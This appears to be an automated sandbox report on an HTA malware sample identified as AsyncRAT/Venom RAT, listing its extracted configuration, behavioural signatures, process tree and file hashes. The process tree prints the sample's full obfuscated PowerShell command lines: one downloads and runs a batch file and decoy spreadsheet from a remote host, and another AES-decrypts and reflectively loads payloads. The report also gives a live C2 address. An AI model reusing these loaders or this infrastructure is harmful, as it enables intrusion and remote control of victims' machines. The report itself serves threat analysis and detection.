Analysis
max time kernel: 146s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-04-2024 01:33
Static task: static1
Behavioral task: behavioral1
Sample: 609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta
Resource: win7-20240221-en
General
Target: 609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta
Size: 12KB
MD5: a76519720925437e61593d697c22d2c3
SHA1: fd9e658d262708c746854082d8a00e9ff998ff95
SHA256: 609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61
SHA512: 8be920887fde3b309df0740568840254230990a0d26ae09340a37beafccaebe5b74f9feb776d0cfbcac13b40591892319d4bf2756cbb64d66e187b7483e9a71d
SSDEEP: 384:OSJ6w3wSSkOLjX30OxjnPC/0OOjHhw/SFfJ+RATJcJ/A4B4/JdNOJitAJ8tluNVe:OSJxgSoLjX3NxjnPC/NOjHhw/S9J+RAL
Malware Config
Extracted
Family: asyncrat
Version: Venom RAT + HVNC + Stealer + Grabber v6.0.3
Botnet: Default
C2: 194.48.251.169:4449
Mutex: wmdekgrrot
delay: 1
install: false
install_folder: %AppData%
Signatures

Async RAT payload (1 IoCs)
resource: behavioral2/memory/4600-125-0x0000000007320000-0x0000000007338000-memory.dmp
yara_rule: family_asyncrat

Detects executables attempting to enumerate video devices using WMI (1 IoCs)
resource: behavioral2/memory/4600-125-0x0000000007320000-0x0000000007338000-memory.dmp
yara_rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice

Blocklisted process makes network request (3 IoCs)
flow 13, pid 936, powershell.exe
flow 14, pid 936, powershell.exe
flow 30, pid 4600, powershell.exe

Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation (mshta.exe)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (EXCEL.EXE)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (EXCEL.EXE)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (EXCEL.EXE)

Enumerates system info in registry (2 TTPs, 3 IoCs)
Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (EXCEL.EXE)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (EXCEL.EXE)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (EXCEL.EXE)

Modifies registry class (1 IoCs)
Key created: \REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000_Classes\Local Settings (powershell.exe)

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
pid 1020, EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (9 IoCs)
pid 936, powershell.exe (2 entries)
pid 4600, powershell.exe (2 entries)
pid 216, powershell.exe (2 entries)
pid 4600, powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Token: SeDebugPrivilege, pid 936, powershell.exe
Token: SeDebugPrivilege, pid 4600, powershell.exe
Token: SeDebugPrivilege, pid 216, powershell.exe

Suspicious use of SetWindowsHookEx (15 IoCs)
pid 1020, EXCEL.EXE (14 entries)
pid 4600, powershell.exe (1 entry)

Suspicious use of WriteProcessMemory (21 IoCs)
PID 968 wrote to memory of 936 (pid 968, mshta.exe, procid_target 84) (3 entries)
PID 936 wrote to memory of 1020 (pid 936, powershell.exe, procid_target 86) (3 entries)
PID 936 wrote to memory of 2636 (pid 936, powershell.exe, procid_target 90) (3 entries)
PID 2636 wrote to memory of 3676 (pid 2636, cmd.exe, procid_target 92) (3 entries)
PID 3676 wrote to memory of 3104 (pid 3676, cmd.exe, procid_target 94) (3 entries)
PID 3676 wrote to memory of 4600 (pid 3676, cmd.exe, procid_target 95) (3 entries)
PID 4600 wrote to memory of 216 (pid 4600, powershell.exe, procid_target 96) (3 entries)
Processes

[level 1] C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\609d44617a0a2884204f59d1350ffa87cef6be04d06c42014957515a6fb12f61.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 968

  [level 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tNWGEJMu($ULFEPiGhOl, $hAwOwjHZ){[IO.File]::WriteAllBytes($ULFEPiGhOl, $hAwOwjHZ)};function PGKDesLMcrTbG($ULFEPiGhOl){if($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69334,69342,69342))) -eq $True){rundll32.exe $ULFEPiGhOl }elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69346,69349,69283))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ULFEPiGhOl}elseif($ULFEPiGhOl.EndsWith((nknmvKToK @(69280,69343,69349,69339))) -eq $True){misexec /qn /i $ULFEPiGhOl}else{Start-Process $ULFEPiGhOl}};function oUMxzMjfRmyfuF($kRhMsCFPNneuPI){$bAYnlERprgsydxZhcb = New-Object (nknmvKToK @(69312,69335,69350,69280,69321,69335,69332,69301,69342,69339,69335,69344,69350));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hAwOwjHZ = $bAYnlERprgsydxZhcb.DownloadData($kRhMsCFPNneuPI);return $hAwOwjHZ};function nknmvKToK($seDVN){$yalEZGZTFwbDQOL=69234;$tpnuZBTtZIpg=$Null;foreach($KCBlEGmaNzzs in $seDVN){$tpnuZBTtZIpg+=[char]($KCBlEGmaNzzs-$yalEZGZTFwbDQOL)};return $tpnuZBTtZIpg};function jSMnCBtJT(){$RhDqJvMegLwjZOQ = $env:AppData + '\';$rQGmlBDswBs = $RhDqJvMegLwjZOQ + 'dbx.xlsx';If(Test-Path -Path $rQGmlBDswBs){Invoke-Item $rQGmlBDswBs;}Else{ $NvyoXyonhCMUvEQanD = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69334,69332,69354,69280,69354,69342,69349,69354));tNWGEJMu $rQGmlBDswBs $NvyoXyonhCMUvEQanD;Invoke-Item $rQGmlBDswBs;};$vILiVqGF = $RhDqJvMegLwjZOQ + 'gogis.bat'; if (Test-Path -Path $vILiVqGF){PGKDesLMcrTbG $vILiVqGF;}Else{ $TIaEiamfAp = oUMxzMjfRmyfuF (nknmvKToK @(69338,69350,69350,69346,69292,69281,69281,69283,69291,69286,69280,69286,69290,69280,69284,69287,69283,69280,69283,69288,69291,69292,69289,69284,69290,69289,69281,69337,69345,69337,69339,69349,69280,69332,69331,69350));tNWGEJMu $vILiVqGF $TIaEiamfAp;PGKDesLMcrTbG $vILiVqGF;};;;;}jSMnCBtJT;
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 936

    [level 3] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\dbx.xlsx"
      - Checks processor information in registry
      - Enumerates system info in registry
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx
      PID: 1020

    [level 3] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
      - Suspicious use of WriteProcessMemory
      PID: 2636

      [level 4] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
        - Suspicious use of WriteProcessMemory
        PID: 3676

        [level 5] C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
          PID: 3104

        [level 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          PID: 4600

          [level 6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 216
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 0774a05ce5ee4c1af7097353c9296c62
SHA1: 658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256: d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512: 104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 215B
MD5: 2c41e5f987ddbc2091406eec26f39f41
SHA1: 8287d92c4b188fc45b2fb245d19888a0e07a1d39
SHA256: 8f28fb922fe35ea0d36371ece2cdcc6bfc4f1bc571c09c63512001e7ce8f1dfa
SHA512: e23acf7eb6c5ca65b4d75da8a96c593aa905090ab8126c91e2e8de78da75d63e1862166ba08e3c8ac09f6271f58261d7c437405374c58ed745820b08707c9f2a

Path: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 24B
MD5: 4fcb2a3ee025e4a10d21e1b154873fe2
SHA1: 57658e2fa594b7d0b99d02e041d0f3418e58856b
SHA256: 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA512: 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

Path: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 847B
MD5: 6bff128451afcbf3ada8eb47da5efaa2
SHA1: 33c0156ad14173f606bd8e33bb41a071dbc77c33
SHA256: 372f00b77b029a4feab042e2f5470b9cf5db3a13e283e9e976331a7b4aaa1ec2
SHA512: 83f211ea56609fbe575713a715e1a403c511bf57f7ffdcb2bb7e47685e9b7d43ab8e400778c0f6781b249ceb7994e165d16d4552cac6879fb31ea4014bf058a0

Filesize: 10KB
MD5: 034b9d3741bf082520555ec8b45fa875
SHA1: b61bbd3d22e803cf608e1ae7e0a5a5851934db49
SHA256: 82bcb0ad710775944bd5d4702595abde2557a84d518d146d389ba58cc1dfcd11
SHA512: 8f721ff1f69eb0881a43bbb540e8adfac8bf94509038e4b5d27282457b426902586e561528329918a12d42bf5b98c4b8f17b676090508a18898ceb6f12cd4eb9

Filesize: 6.9MB
MD5: a65e873839228c5b453d6effa5d14d16
SHA1: 40be429e0e6b41061f3291d10e720eaebf32eda1
SHA256: 59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
SHA512: 84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850